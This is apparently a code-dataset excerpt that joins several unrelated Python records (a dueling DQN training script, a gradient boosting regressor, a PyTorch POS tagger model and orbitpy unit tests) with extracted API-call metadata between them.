# Get the environment and extract the number of actions.
env = gym.make(ENV_NAME)
env = WrapThreeFrames(env)
np.random.seed(98283476)
env.seed(87518645)
nb_actions = env.action_space.n
# Next, we build a very simple model regardless of the dueling architecture.
# If you enable the dueling network in DQN, it will build a dueling network based on your model automatically.
# Alternatively, you can build a dueling network yourself and turn off the dueling network in DQN.
model = Sequential()
model.add(Flatten(input_shape=(1,) + env.observation_space.shape))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(nb_actions, activation='sigmoid'))
print(model.summary())
# Finally, we configure and compile our agent. You can use every built-in Keras optimizer and
# even the metrics!
memory = SequentialMemory(limit=50000, window_length=1)
policy = BoltzmannQPolicy()
# enable the dueling network
# you can specify the dueling_type to one of {'avg','max','naive'}
dqn = DQNAgent(model=model, nb_actions=nb_actions, memory=memory, nb_steps_warmup=100,
enable_dueling_network=True, dueling_type='avg', target_model_update=1e-2, policy=policy)
dqn.compile(Adam(lr=1e-3), metrics=['mae'])
# Okay, now it's time to learn something! Visualizing training slows it down quite a lot,
# so it is disabled here. You can always safely abort the training prematurely using
# Ctrl + C.
dqn.fit(env, nb_steps=50000, visualize=False, verbose=2)
# After training is done, we save the final weights.
dqn.save_weights('duel_dqn_{}_weights.h5f'.format(ENV_NAME), overwrite=True)
#dqn.load_weights('duel_dqn_{}_weights.h5f'.format(ENV_NAME))
# Finally, evaluate our algorithm for 5 episodes.
print(dqn.test(env, nb_episodes=5, nb_max_episode_steps=10000, visualize=True))
|
[
"rl.memory.SequentialMemory",
"rl.agents.dqn.DQNAgent",
"numpy.random.seed",
"gym.make",
"keras.layers.Activation",
"keras.layers.Flatten",
"rl.policy.BoltzmannQPolicy",
"keras.optimizers.Adam",
"gym.ObservationWrapper.__init__",
"keras.layers.Dense",
"gym.spaces.Box",
"keras.models.Sequential"
] |
[((1015, 1033), 'gym.make', 'gym.make', (['ENV_NAME'], {}), '(ENV_NAME)\n', (1023, 1033), False, 'import gym\n'), ((1061, 1085), 'numpy.random.seed', 'np.random.seed', (['(98283476)'], {}), '(98283476)\n', (1075, 1085), True, 'import numpy as np\n'), ((1422, 1434), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (1432, 1434), False, 'from keras.models import Sequential\n'), ((1802, 1848), 'rl.memory.SequentialMemory', 'SequentialMemory', ([], {'limit': '(50000)', 'window_length': '(1)'}), '(limit=50000, window_length=1)\n', (1818, 1848), False, 'from rl.memory import SequentialMemory\n'), ((1858, 1876), 'rl.policy.BoltzmannQPolicy', 'BoltzmannQPolicy', ([], {}), '()\n', (1874, 1876), False, 'from rl.policy import BoltzmannQPolicy\n'), ((1979, 2158), 'rl.agents.dqn.DQNAgent', 'DQNAgent', ([], {'model': 'model', 'nb_actions': 'nb_actions', 'memory': 'memory', 'nb_steps_warmup': '(100)', 'enable_dueling_network': '(True)', 'dueling_type': '"""avg"""', 'target_model_update': '(0.01)', 'policy': 'policy'}), "(model=model, nb_actions=nb_actions, memory=memory, nb_steps_warmup\n =100, enable_dueling_network=True, dueling_type='avg',\n target_model_update=0.01, policy=policy)\n", (1987, 2158), False, 'from rl.agents.dqn import DQNAgent\n'), ((1445, 1500), 'keras.layers.Flatten', 'Flatten', ([], {'input_shape': '((1,) + env.observation_space.shape)'}), '(input_shape=(1,) + env.observation_space.shape)\n', (1452, 1500), False, 'from keras.layers import Dense, Activation, Flatten\n'), ((1512, 1521), 'keras.layers.Dense', 'Dense', (['(16)'], {}), '(16)\n', (1517, 1521), False, 'from keras.layers import Dense, Activation, Flatten\n'), ((1533, 1551), 'keras.layers.Activation', 'Activation', (['"""relu"""'], {}), "('relu')\n", (1543, 1551), False, 'from keras.layers import Dense, Activation, Flatten\n'), ((1563, 1572), 'keras.layers.Dense', 'Dense', (['(16)'], {}), '(16)\n', (1568, 1572), False, 'from keras.layers import Dense, Activation, Flatten\n'), ((1584, 1602), 'keras.layers.Activation', 'Activation', (['"""relu"""'], {}), "('relu')\n", (1594, 1602), False, 'from keras.layers import Dense, Activation, Flatten\n'), ((1614, 1653), 'keras.layers.Dense', 'Dense', (['nb_actions'], {'activation': '"""sigmoid"""'}), "(nb_actions, activation='sigmoid')\n", (1619, 1653), False, 'from keras.layers import Dense, Activation, Flatten\n'), ((2177, 2191), 'keras.optimizers.Adam', 'Adam', ([], {'lr': '(0.001)'}), '(lr=0.001)\n', (2181, 2191), False, 'from keras.optimizers import Adam\n'), ((406, 448), 'gym.ObservationWrapper.__init__', 'gym.ObservationWrapper.__init__', (['self', 'env'], {}), '(self, env)\n', (437, 448), False, 'import gym\n'), ((482, 523), 'gym.spaces.Box', 'spaces.Box', ([], {'low': '(0.0)', 'high': '(1.0)', 'shape': '(9,)'}), '(low=0.0, high=1.0, shape=(9,))\n', (492, 523), False, 'from gym import spaces\n')]
|
from pyml.tree.regression import DecisionTreeRegressor
from pyml.metrics.pairwise import euclidean_distance
import numpy as np
# TODO: decide whether to use squared error, absolute error, or Huber loss
class GradientBoostingRegression():
def __init__(self,
learning_rate=0.1,
base_estimator=DecisionTreeRegressor,
n_estimators=500,
random_state=None
):
self.estimators = []
self.n_estimators = n_estimators
self.base_estimator = base_estimator
self.learning_rate = learning_rate
self.parameters = {
'f' : [],
'lr' : []
}
# key='f' : a list of estimator
# key='lr' : a list of learning_rate
def optimizer(self, X, Y, watch=False):
"""
        Run one boosting iteration: fit a new base estimator to the negative gradient.
"""
cur_Y_pred = self.predict(X)
# print('cur_Y_pred : ', cur_Y_pred)
        # Compute the cost (Euclidean distance between the current prediction and the target)
cost = euclidean_distance(cur_Y_pred, Y)
        # Compute the residual, i.e. the gradient of the squared-error loss
d_fx = cur_Y_pred - Y
# print('d_fx : ', d_fx)
        # Negate the gradient to get the descent direction
d_fx = - d_fx
        # Learning rate; here it simply uses the value given at initialisation
lr = self.learning_rate
        # Create a new base estimator and fit it to the negative gradient
new_estimator = self.base_estimator()
new_estimator.fit(X,d_fx)
self.parameters['f'].append(new_estimator)
self.parameters['lr'].append(lr)
return cost
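    # A note on the update above (assuming the implicit squared-error loss that
    # this residual corresponds to): for L(y, f) = 0.5 * (y - f)^2 the gradient
    # with respect to the current prediction f is dL/df = f - y, so the negative
    # gradient y - f is exactly the residual the new base estimator is fitted to.
    # Each round therefore updates the ensemble as f(x) <- f(x) + learning_rate * h(x),
    # which matches how predict() sums estimator outputs weighted by 'lr' below.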
def fit(self, X, Y, watch=False):
init_estimator = self.base_estimator()
init_estimator.fit(X,Y)
self.parameters['f'].append(init_estimator)
self.parameters['lr'].append(1)
for i in range(self.n_estimators):
cost = self.optimizer(X,Y)
if i % 10 == 0:
print('train {}/{} current cost : {}'.format(i,self.n_estimators,cost))
def predict(self, X_pred):
"""
Parameters
-------------
        X_pred : 2d array-like shape (n_samples, n_features)
Returns
--------------
pre_Y : 1d array-like shape(n_samples,)
"""
# the number of features should be consistent.
total_num = X_pred.shape[0]
Y_pred = np.zeros((total_num))
for cur_estimator, lr in zip(self.parameters['f'], self.parameters['lr']):
Y_pred += cur_estimator.predict(X_pred) * lr
return Y_pred
if __name__ == '__main__':
mini_train_X = np.array([
[1,2,3,4,5,6,7,8],
[2,3,4,5,6,7,8,9],
[3,4,5,6,7,8,9,10],
[4,5,6,7,8,9,10,11],
[5,6,7,8,9,10,11,12],
[6,7,8,9,10,11,12,13],
[7,8,9,10,11,12,13,14]
])
mini_train_Y = np.array([
1.5,2.5,3.5,4.5,5.5,6.5,7.5
])
mini_test_X = np.array([
[2,3,4,5,6,7.5,8,9],
[4,5,6,7.5,8,9,10,11]
])
mini_standard_out_Y = np.array([
2.5,4.5
])
rgs = GradientBoostingRegression()
rgs.fit(mini_train_X,mini_train_Y)
print(rgs.predict(mini_test_X))
|
[
"numpy.zeros",
"pyml.metrics.pairwise.euclidean_distance",
"numpy.array"
] |
[((2317, 2533), 'numpy.array', 'np.array', (['[[1, 2, 3, 4, 5, 6, 7, 8], [2, 3, 4, 5, 6, 7, 8, 9], [3, 4, 5, 6, 7, 8, 9, \n 10], [4, 5, 6, 7, 8, 9, 10, 11], [5, 6, 7, 8, 9, 10, 11, 12], [6, 7, 8,\n 9, 10, 11, 12, 13], [7, 8, 9, 10, 11, 12, 13, 14]]'], {}), '([[1, 2, 3, 4, 5, 6, 7, 8], [2, 3, 4, 5, 6, 7, 8, 9], [3, 4, 5, 6, \n 7, 8, 9, 10], [4, 5, 6, 7, 8, 9, 10, 11], [5, 6, 7, 8, 9, 10, 11, 12],\n [6, 7, 8, 9, 10, 11, 12, 13], [7, 8, 9, 10, 11, 12, 13, 14]])\n', (2325, 2533), True, 'import numpy as np\n'), ((2557, 2602), 'numpy.array', 'np.array', (['[1.5, 2.5, 3.5, 4.5, 5.5, 6.5, 7.5]'], {}), '([1.5, 2.5, 3.5, 4.5, 5.5, 6.5, 7.5])\n', (2565, 2602), True, 'import numpy as np\n'), ((2629, 2697), 'numpy.array', 'np.array', (['[[2, 3, 4, 5, 6, 7.5, 8, 9], [4, 5, 6, 7.5, 8, 9, 10, 11]]'], {}), '([[2, 3, 4, 5, 6, 7.5, 8, 9], [4, 5, 6, 7.5, 8, 9, 10, 11]])\n', (2637, 2697), True, 'import numpy as np\n'), ((2732, 2752), 'numpy.array', 'np.array', (['[2.5, 4.5]'], {}), '([2.5, 4.5])\n', (2740, 2752), True, 'import numpy as np\n'), ((877, 910), 'pyml.metrics.pairwise.euclidean_distance', 'euclidean_distance', (['cur_Y_pred', 'Y'], {}), '(cur_Y_pred, Y)\n', (895, 910), False, 'from pyml.metrics.pairwise import euclidean_distance\n'), ((2086, 2105), 'numpy.zeros', 'np.zeros', (['total_num'], {}), '(total_num)\n', (2094, 2105), True, 'import numpy as np\n')]
|
# was stanza.models.pos.model
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.utils.rnn import pad_packed_sequence, pack_padded_sequence, pack_sequence, PackedSequence
from biaffine import BiaffineScorer
from hlstm import HighwayLSTM
from dropout import WordDropout
from char_model import CharacterModel
class Tagger(nn.Module):
def __init__(self, args, vocab, emb_matrix=None):
super().__init__()
self.vocab = vocab
self.args = args
self.use_pretrained = emb_matrix is not None
self.use_char = args['char_emb_dim'] > 0
self.use_word = args['word_emb_dim'] > 0
self.share_hid = args['pos_emb_dim'] < 1
self.unsaved_modules = []
def add_unsaved_module(name, module):
self.unsaved_modules += [name]
setattr(self, name, module)
# input layers
input_size = 0
if self.use_word:
# frequent word embeddings
self.word_emb = nn.Embedding(len(vocab['word']), self.args['word_emb_dim'], padding_idx=0)
input_size += self.args['word_emb_dim']
if not self.share_hid:
# pos embeddings
self.pos_emb = nn.Embedding(len(vocab['pos']), self.args['pos_emb_dim'], padding_idx=0)
if self.use_char:
self.charmodel = CharacterModel(args, vocab, bidirectional=args['char_bidir'])
self.trans_char = nn.Linear(self.charmodel.num_dir * self.args['char_hidden_dim'], self.args['transformed_dim'], bias=False)
input_size += self.args['transformed_dim']
if self.use_pretrained:
# pretrained embeddings, by default this won't be saved into model file
add_unsaved_module('pretrained_emb', nn.Embedding.from_pretrained(torch.from_numpy(emb_matrix), freeze=True))
self.trans_pretrained = nn.Linear(emb_matrix.shape[1], self.args['transformed_dim'], bias=False)
input_size += self.args['transformed_dim']
# recurrent layers
self.taggerlstm = HighwayLSTM(input_size, self.args['tag_hidden_dim'], self.args['tag_num_layers'], batch_first=True, bidirectional=True, dropout=self.args['dropout'], rec_dropout=self.args['tag_rec_dropout'], highway_func=torch.tanh)
self.drop_replacement = nn.Parameter(torch.randn(input_size) / np.sqrt(input_size))
self.taggerlstm_h_init = nn.Parameter(torch.zeros(2 * self.args['tag_num_layers'], 1, self.args['tag_hidden_dim']))
self.taggerlstm_c_init = nn.Parameter(torch.zeros(2 * self.args['tag_num_layers'], 1, self.args['tag_hidden_dim']))
# classifiers
self.pos_hid = nn.Linear(self.args['tag_hidden_dim'] * 2, self.args['deep_biaff_hidden_dim'])
self.pos_clf = nn.Linear(self.args['deep_biaff_hidden_dim'], len(vocab['pos']))
self.pos_clf.weight.data.zero_()
self.pos_clf.bias.data.zero_()
if self.share_hid:
clf_constructor = lambda insize, outsize: nn.Linear(insize, outsize)
else:
self.feats_hid = nn.Linear(self.args['tag_hidden_dim'] * 2, self.args['composite_deep_biaff_hidden_dim'])
clf_constructor = lambda insize, outsize: BiaffineScorer(insize, self.args['pos_emb_dim'], outsize)
self.feats_clf = nn.ModuleList()
for l in vocab['feats'].lens():
if self.share_hid:
self.feats_clf.append(clf_constructor(self.args['deep_biaff_hidden_dim'], l))
self.feats_clf[-1].weight.data.zero_()
self.feats_clf[-1].bias.data.zero_()
else:
self.feats_clf.append(clf_constructor(self.args['composite_deep_biaff_hidden_dim'], l))
# criterion
self.crit = nn.CrossEntropyLoss(ignore_index=0) # ignore padding
self.drop = nn.Dropout(args['dropout'])
self.worddrop = WordDropout(args['word_dropout'])
def forward(self, word, word_mask, wordchars, wordchars_mask, pos, feats, pretrained, word_orig_idx, sentlens, wordlens):
def pack(x):
return pack_padded_sequence(x, sentlens, batch_first=True)
def get_batch_sizes(sentlens):
b = []
for i in range(max(sentlens)):
c = len([x for x in sentlens if x > i])
b.append(c)
return torch.tensor(b)
def pad(x):
return pad_packed_sequence(PackedSequence(x, batch_sizes), batch_first=True)[0]
inputs = []
if self.use_word:
word_emb = self.word_emb(word)
word_emb = pack(word_emb)
inputs += [word_emb]
batch_sizes = word_emb.batch_sizes
else:
batch_sizes = get_batch_sizes(sentlens)
if self.use_pretrained:
pretrained_emb = self.pretrained_emb(pretrained)
pretrained_emb = self.trans_pretrained(pretrained_emb)
pretrained_emb = pack(pretrained_emb)
inputs += [pretrained_emb]
if self.use_char:
char_reps = self.charmodel(wordchars, wordchars_mask, word_orig_idx, sentlens, wordlens)
char_reps = PackedSequence(self.trans_char(self.drop(char_reps.data)), char_reps.batch_sizes)
inputs += [char_reps]
lstm_inputs = torch.cat([x.data for x in inputs], 1)
lstm_inputs = self.worddrop(lstm_inputs, self.drop_replacement)
lstm_inputs = self.drop(lstm_inputs)
lstm_inputs = PackedSequence(lstm_inputs, inputs[0].batch_sizes)
lstm_outputs, _ = self.taggerlstm(lstm_inputs, sentlens, hx=(self.taggerlstm_h_init.expand(2 * self.args['tag_num_layers'], word.size(0), self.args['tag_hidden_dim']).contiguous(), self.taggerlstm_c_init.expand(2 * self.args['tag_num_layers'], word.size(0), self.args['tag_hidden_dim']).contiguous()))
lstm_outputs = lstm_outputs.data
pos_hid = F.relu(self.pos_hid(self.drop(lstm_outputs)))
pos_pred = self.pos_clf(self.drop(pos_hid))
preds = [pad(pos_pred).max(2)[1]]
pos = pack(pos).data
loss = self.crit(pos_pred.view(-1, pos_pred.size(-1)), pos.view(-1))
if self.share_hid:
feats_hid = pos_hid
clffunc = lambda clf, hid: clf(self.drop(hid))
else:
feats_hid = F.relu(self.feats_hid(self.drop(lstm_outputs)))
# TODO: self.training is never set, but check if this is a bug
#if self.training: pos_emb = self.pos_emb(pos) else:
pos_emb = self.pos_emb(pos_pred.max(1)[1])
clffunc = lambda clf, hid: clf(self.drop(hid), self.drop(pos_emb))
feats_preds = []
feats = pack(feats).data
for i in range(len(self.vocab['feats'])):
feats_pred = clffunc(self.feats_clf[i], feats_hid)
loss += self.crit(feats_pred.view(-1, feats_pred.size(-1)), feats[:, i].view(-1))
feats_preds.append(pad(feats_pred).max(2, keepdim=True)[1])
preds.append(torch.cat(feats_preds, 2))
return loss, preds
if __name__ == "__main__":
print("This file cannot be used on its own.")
print("To launch the tagger, use tagger.py instead of model.py")
|
[
"torch.nn.Dropout",
"torch.nn.utils.rnn.pack_padded_sequence",
"torch.from_numpy",
"biaffine.BiaffineScorer",
"torch.nn.ModuleList",
"dropout.WordDropout",
"torch.nn.CrossEntropyLoss",
"torch.cat",
"torch.nn.utils.rnn.PackedSequence",
"torch.zeros",
"torch.randn",
"torch.nn.Linear",
"hlstm.HighwayLSTM",
"numpy.sqrt",
"torch.tensor",
"char_model.CharacterModel"
] |
[((2077, 2308), 'hlstm.HighwayLSTM', 'HighwayLSTM', (['input_size', "self.args['tag_hidden_dim']", "self.args['tag_num_layers']"], {'batch_first': '(True)', 'bidirectional': '(True)', 'dropout': "self.args['dropout']", 'rec_dropout': "self.args['tag_rec_dropout']", 'highway_func': 'torch.tanh'}), "(input_size, self.args['tag_hidden_dim'], self.args[\n 'tag_num_layers'], batch_first=True, bidirectional=True, dropout=self.\n args['dropout'], rec_dropout=self.args['tag_rec_dropout'], highway_func\n =torch.tanh)\n", (2088, 2308), False, 'from hlstm import HighwayLSTM\n'), ((2680, 2758), 'torch.nn.Linear', 'nn.Linear', (["(self.args['tag_hidden_dim'] * 2)", "self.args['deep_biaff_hidden_dim']"], {}), "(self.args['tag_hidden_dim'] * 2, self.args['deep_biaff_hidden_dim'])\n", (2689, 2758), True, 'import torch.nn as nn\n'), ((3306, 3321), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (3319, 3321), True, 'import torch.nn as nn\n'), ((3758, 3793), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {'ignore_index': '(0)'}), '(ignore_index=0)\n', (3777, 3793), True, 'import torch.nn as nn\n'), ((3831, 3858), 'torch.nn.Dropout', 'nn.Dropout', (["args['dropout']"], {}), "(args['dropout'])\n", (3841, 3858), True, 'import torch.nn as nn\n'), ((3883, 3916), 'dropout.WordDropout', 'WordDropout', (["args['word_dropout']"], {}), "(args['word_dropout'])\n", (3894, 3916), False, 'from dropout import WordDropout\n'), ((5286, 5324), 'torch.cat', 'torch.cat', (['[x.data for x in inputs]', '(1)'], {}), '([x.data for x in inputs], 1)\n', (5295, 5324), False, 'import torch\n'), ((5464, 5514), 'torch.nn.utils.rnn.PackedSequence', 'PackedSequence', (['lstm_inputs', 'inputs[0].batch_sizes'], {}), '(lstm_inputs, inputs[0].batch_sizes)\n', (5478, 5514), False, 'from torch.nn.utils.rnn import pad_packed_sequence, pack_padded_sequence, pack_sequence, PackedSequence\n'), ((1366, 1427), 'char_model.CharacterModel', 'CharacterModel', (['args', 'vocab'], {'bidirectional': "args['char_bidir']"}), "(args, vocab, bidirectional=args['char_bidir'])\n", (1380, 1427), False, 'from char_model import CharacterModel\n'), ((1458, 1569), 'torch.nn.Linear', 'nn.Linear', (["(self.charmodel.num_dir * self.args['char_hidden_dim'])", "self.args['transformed_dim']"], {'bias': '(False)'}), "(self.charmodel.num_dir * self.args['char_hidden_dim'], self.args[\n 'transformed_dim'], bias=False)\n", (1467, 1569), True, 'import torch.nn as nn\n'), ((1895, 1967), 'torch.nn.Linear', 'nn.Linear', (['emb_matrix.shape[1]', "self.args['transformed_dim']"], {'bias': '(False)'}), "(emb_matrix.shape[1], self.args['transformed_dim'], bias=False)\n", (1904, 1967), True, 'import torch.nn as nn\n'), ((2432, 2508), 'torch.zeros', 'torch.zeros', (["(2 * self.args['tag_num_layers'])", '(1)', "self.args['tag_hidden_dim']"], {}), "(2 * self.args['tag_num_layers'], 1, self.args['tag_hidden_dim'])\n", (2443, 2508), False, 'import torch\n'), ((2556, 2632), 'torch.zeros', 'torch.zeros', (["(2 * self.args['tag_num_layers'])", '(1)', "self.args['tag_hidden_dim']"], {}), "(2 * self.args['tag_num_layers'], 1, self.args['tag_hidden_dim'])\n", (2567, 2632), False, 'import torch\n'), ((3079, 3172), 'torch.nn.Linear', 'nn.Linear', (["(self.args['tag_hidden_dim'] * 2)", "self.args['composite_deep_biaff_hidden_dim']"], {}), "(self.args['tag_hidden_dim'] * 2, self.args[\n 'composite_deep_biaff_hidden_dim'])\n", (3088, 3172), True, 'import torch.nn as nn\n'), ((4085, 4136), 'torch.nn.utils.rnn.pack_padded_sequence', 'pack_padded_sequence', (['x', 'sentlens'], 
{'batch_first': '(True)'}), '(x, sentlens, batch_first=True)\n', (4105, 4136), False, 'from torch.nn.utils.rnn import pad_packed_sequence, pack_padded_sequence, pack_sequence, PackedSequence\n'), ((4342, 4357), 'torch.tensor', 'torch.tensor', (['b'], {}), '(b)\n', (4354, 4357), False, 'import torch\n'), ((6972, 6997), 'torch.cat', 'torch.cat', (['feats_preds', '(2)'], {}), '(feats_preds, 2)\n', (6981, 6997), False, 'import torch\n'), ((2339, 2362), 'torch.randn', 'torch.randn', (['input_size'], {}), '(input_size)\n', (2350, 2362), False, 'import torch\n'), ((2365, 2384), 'numpy.sqrt', 'np.sqrt', (['input_size'], {}), '(input_size)\n', (2372, 2384), True, 'import numpy as np\n'), ((3009, 3035), 'torch.nn.Linear', 'nn.Linear', (['insize', 'outsize'], {}), '(insize, outsize)\n', (3018, 3035), True, 'import torch.nn as nn\n'), ((3222, 3279), 'biaffine.BiaffineScorer', 'BiaffineScorer', (['insize', "self.args['pos_emb_dim']", 'outsize'], {}), "(insize, self.args['pos_emb_dim'], outsize)\n", (3236, 3279), False, 'from biaffine import BiaffineScorer\n'), ((1815, 1843), 'torch.from_numpy', 'torch.from_numpy', (['emb_matrix'], {}), '(emb_matrix)\n', (1831, 1843), False, 'import torch\n'), ((4418, 4448), 'torch.nn.utils.rnn.PackedSequence', 'PackedSequence', (['x', 'batch_sizes'], {}), '(x, batch_sizes)\n', (4432, 4448), False, 'from torch.nn.utils.rnn import pad_packed_sequence, pack_padded_sequence, pack_sequence, PackedSequence\n')]
|
"""Unit tests for orbitpy.util module.
"""
import unittest
import numpy as np
from numpy.core.numeric import tensordot
from instrupy.util import Orientation
from instrupy import Instrument
from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft
import orbitpy.util
import propcov
from util.spacecrafts import spc1_json, spc2_json, spc3_json
class TestOrbitState(unittest.TestCase):
def test_date_from_dict(self):
x = OrbitState.date_from_dict({"@type":"JULIAN_DATE_UT1", "jd":2459270.75})
self.assertIsInstance(x, propcov.AbsoluteDate)
y = OrbitState.date_from_dict({"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0})
self.assertIsInstance(y, propcov.AbsoluteDate)
self.assertEqual(x, y)
def test_state_from_dict(self):
x = OrbitState.state_from_dict({"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6867, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25})
self.assertIsInstance(x, propcov.OrbitState)
cart_state = x.GetCartesianState().GetRealArray()
y = OrbitState.state_from_dict({"@type": "CARTESIAN_EARTH_CENTERED_INERTIAL", "x": cart_state[0], "y": cart_state[1], "z": cart_state[2], "vx": cart_state[3], "vy": cart_state[4], "vz": cart_state[5]})
self.assertIsInstance(y, propcov.OrbitState)
self.assertEqual(x, y)
def test_date_to_dict(self): #@TODO
pass
def test_state_to_dict(self): #@TODO
pass
def test_get_julian_date(self): #@TODO
pass
def test_get_cartesian_earth_centered_inertial_state(self): #@TODO
pass
def test_get_keplerian_earth_centered_inertial_state(self): #@TODO
pass
def test_from_dict(self):
# Julian date, Cartesian state
o = OrbitState.from_dict({"date":{"@type":"JULIAN_DATE_UT1", "jd":2459270.75},
"state":{"@type": "CARTESIAN_EARTH_CENTERED_INERTIAL", "x": 6878.137, "y": 0, "z": 0, "vx": 0, "vy": 7.6126, "vz": 0},
"@id": 123})
self.assertIsInstance(o, OrbitState)
self.assertEqual(o._id, 123)
self.assertEqual(o.date, propcov.AbsoluteDate.fromJulianDate(2459270.75))
self.assertEqual(o.state, propcov.OrbitState.fromCartesianState(propcov.Rvector6([6878.137,0,0,0,7.6126,0])))
# Gregorian date, Keplerian state
o = OrbitState.from_dict({"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0},
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25},
})
self.assertIsInstance(o, OrbitState)
self.assertIsNone(o._id)
self.assertEqual(o.date, propcov.AbsoluteDate.fromGregorianDate(2021, 2, 25, 6 ,0, 0))
self.assertEqual(o.state, propcov.OrbitState.fromKeplerianState(6878.137, 0.001, np.deg2rad(45), np.deg2rad(35), np.deg2rad(145), np.deg2rad(-25)))
def test_to_dict(self): #@TODO test Keplerian state output
# Input: Julian date, Cartesian state
o = OrbitState.from_dict({"date":{"@type":"JULIAN_DATE_UT1", "jd":2459270.75},
"state":{"@type": "CARTESIAN_EARTH_CENTERED_INERTIAL", "x": 6878.137, "y": 0, "z": 0, "vx": 0, "vy": 7.6126, "vz": 0},
})
d = o.to_dict()
self.assertEqual(d["date"]["@type"], "JULIAN_DATE_UT1")
self.assertEqual(d["date"]["jd"], 2459270.75)
self.assertEqual(d["state"]["@type"], "CARTESIAN_EARTH_CENTERED_INERTIAL")
self.assertAlmostEqual(d["state"]["x"], 6878.137)
self.assertEqual(d["state"]["y"], 0)
self.assertEqual(d["state"]["z"], 0)
self.assertEqual(d["state"]["vx"], 0)
self.assertEqual(d["state"]["vy"], 7.6126)
self.assertEqual(d["state"]["vz"], 0)
self.assertIsNone(d["@id"])
# Input: Gregorian date, Keplerian state
o = OrbitState.from_dict({"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0},
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25},
"@id": "123"})
d = o.to_dict()
date = o.get_julian_date()
state = o.get_cartesian_earth_centered_inertial_state()
self.assertEqual(d["date"]["@type"], "JULIAN_DATE_UT1")
self.assertEqual(d["date"]["jd"], date)
self.assertEqual(d["state"]["@type"], "CARTESIAN_EARTH_CENTERED_INERTIAL")
self.assertAlmostEqual(d["state"]["x"], state[0])
self.assertEqual(d["state"]["y"], state[1])
self.assertEqual(d["state"]["z"], state[2])
self.assertEqual(d["state"]["vx"], state[3])
self.assertEqual(d["state"]["vy"], state[4])
self.assertEqual(d["state"]["vz"], state[5])
self.assertEqual(d["@id"], "123")
class TestSpacecraftBus(unittest.TestCase):
def test_from_json(self):
# typical case
o = SpacecraftBus.from_json('{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", \
"convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}')
self.assertEqual(o.name, "BlueCanyon")
self.assertEqual(o.mass, 20)
self.assertEqual(o.volume, 0.5)
self.assertEqual(o.orientation, Orientation.from_dict({"referenceFrame":"Nadir_pointing", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}))
self.assertIsNone(o.solarPanelConfig)
self.assertEqual(o._id, 123)
# check default orientation
o = SpacecraftBus.from_json('{"name": "Microsat", "mass": 100, "volume": 1}')
self.assertEqual(o.name, "Microsat")
self.assertEqual(o.mass, 100)
self.assertEqual(o.volume, 1)
self.assertEqual(o.orientation, Orientation.from_dict({"referenceFrame":"Nadir_pointing", "convention": "REF_FRAME_ALIGNED"}))
self.assertIsNone(o.solarPanelConfig)
self.assertIsNone(o._id)
# side look orientation
o = SpacecraftBus.from_json('{"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "SIDE_LOOK", "sideLookAngle":-10}, "@id":123}')
self.assertIsNone(o.name)
self.assertIsNone(o.mass)
self.assertIsNone(o.volume)
self.assertEqual(o.orientation, Orientation.from_dict({"referenceFrame":"Nadir_pointing", "convention": "SIDE_LOOK", "sideLookAngle":-10}))
self.assertIsNone(o.solarPanelConfig)
self.assertEqual(o._id, 123)
# Euler rotation specification, ECI frame
o = SpacecraftBus.from_json('{"orientation":{"referenceFrame": "EARTH_CENTERED_INERTIAL", "convention": "XYZ","xRotation":10,"yRotation":-10.4,"zRotation":20.78}}')
self.assertIsNone(o.name)
self.assertIsNone(o.mass)
self.assertIsNone(o.volume)
self.assertEqual(o.orientation, Orientation.from_dict({"referenceFrame":"EARTH_CENTERED_INERTIAL", "convention": "XYZ","xRotation":10,"yRotation":-10.4,"zRotation":20.78}))
self.assertIsNone(o.solarPanelConfig)
self.assertIsNone(o._id)
def test_to_dict(self):
# typical case
o = SpacecraftBus.from_json('{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", \
"convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}')
o_dict = o.to_dict()
self.assertEqual(o_dict['name'], 'BlueCanyon')
self.assertEqual(o_dict['mass'], 20)
self.assertEqual(o_dict['volume'], 0.5)
self.assertIsNone(o_dict['solarPanelConfig'])
self.assertEqual(o_dict['orientation']['eulerAngle1'], 0)
self.assertEqual(o_dict['orientation']['eulerAngle2'], 0)
self.assertEqual(o_dict['orientation']['eulerAngle3'], 0)
self.assertEqual(o_dict['orientation']['eulerSeq1'], 1)
self.assertEqual(o_dict['orientation']['eulerSeq2'], 2)
self.assertEqual(o_dict['orientation']['eulerSeq3'], 3)
self.assertEqual(o_dict['orientation']['@id'], 'abc')
self.assertEqual(o_dict['@id'], 123)
def test___eq_(self):
# typical case, note that "@id" can be different.
o1 = SpacecraftBus.from_json('{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", \
"convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}')
o2 = SpacecraftBus.from_json('{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", \
"convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":"abc"}')
self.assertEqual(o1, o2)
o2 = SpacecraftBus.from_json('{"name": "BlueCanyon", "mass": 10, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", \
"convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}')
